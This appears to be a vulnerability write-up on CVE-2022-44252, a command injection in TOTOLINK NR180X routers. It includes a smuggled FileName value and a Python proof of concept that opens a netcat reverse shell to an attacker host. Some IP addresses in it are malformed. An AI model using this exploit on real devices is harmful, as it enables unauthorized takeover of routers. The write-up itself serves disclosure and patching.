CVE CyberSecurity Database News

CVE-2022-44252 - How TOTOLINK NR180X’s FileName Parameter Allows Command Injection

Poster -

TOTOLINK routers are a popular choice for home and small office networks because they’re budget-friendly and easy to use. But as with many connected devices, vulnerabilities happen—and some can be dangerous. One such flaw is CVE-2022-44252, found in the TOTOLINK NR180X (firmware version V9.1.u.6279_B20210910), which can let attackers run their own commands on your router using a simple trick in the FileName upload function. This post breaks it all down in plain English, with code, links, and a walk-through of how this bug can be exploited.

What is CVE-2022-44252?

CVE-2022-44252 is a critical command injection vulnerability found in TOTOLINK NR180X routers, specifically in the firmware version V9.1.u.6279_B20210910. The bug is present in the function that handles setting upload configurations—namely, the setUploadSetting function. This function doesn’t check or sanitize the contents of the FileName parameter, which lets an attacker slip in malicious commands.

Parameter: FileName in setUploadSetting

- CVE: CVE-2022-44252

How Does the Vulnerability Work?

When users upload files (like settings or backups) to the router, the web interface receives several parameters. Among them is a parameter called FileName. The backend code takes that value and, without any checking, uses it in a system command. If you slip a semicolon (;) and a shell command into the filename, the router will execute it.

Example Vulnerable Code (Pseudo)

// Pseudo-code that demonstrates the fault
void setUploadSetting(char* FileName) {
    char cmd[256];
    // Vulnerable: FileName is used directly in system()
    sprintf(cmd, "cp %s /tmp/upload/", FileName);
    system(cmd);
}


If you control FileName, you control the command.

Access the File Upload Feature

An attacker locates the router’s admin portal, usually on the local network (but sometimes exposed to the internet).

Instead of a normal file name like backup.cfg, the attacker sends something like:

backup.cfg; nc 192.168..100 4444 -e /bin/sh;

Send the Request

The attacker sends a POST request to the setUploadSetting endpoint. This can be done using Python’s requests library.

Router Executes The Command(s)

The router, when processing the upload, runs system(cmd), which now includes the attacker's command.

Here’s a simple proof-of-concept exploit for educational purposes

import requests

# Router details
url = "http://192.168..1/cgi-bin/cstecgi.cgi";
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
# Evil filename injects a reverse shell
data = {
    "topicurl": "setUploadSetting",
    "FileName": "normal.cfg; nc 192.168..100 4444 -e /bin/sh;"
}

# Send malicious request
response = requests.post(url, headers=headers, data=data)
print(f"Status: {response.status_code}")
print(response.text)


Note: Run a netcat listener on your machine:  

nc -lvnp 4444


If the exploit works, you get a shell from the router!

Update your Firmware!

Check TOTOLINK’s support page for a fixed firmware version for your model.

Further References

- CVE-2022-44252 on MITRE
- TOTOLINK NR180X Download/Firmware
- Original vulnerability report (GitHub)
- Vuln Note on Exploit Database

Conclusion

CVE-2022-44252 is a real-world example of how a small coding mistake (not checking user input) can cause a big security hole. If you own or manage a TOTOLINK NR180X router (or similar models), update ASAP and double-check your network’s defenses.

Stay safe, and patch your stuff!

*This article is for educational purposes only. Always get permission before testing on any device you don’t own.*

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:42:00 UTC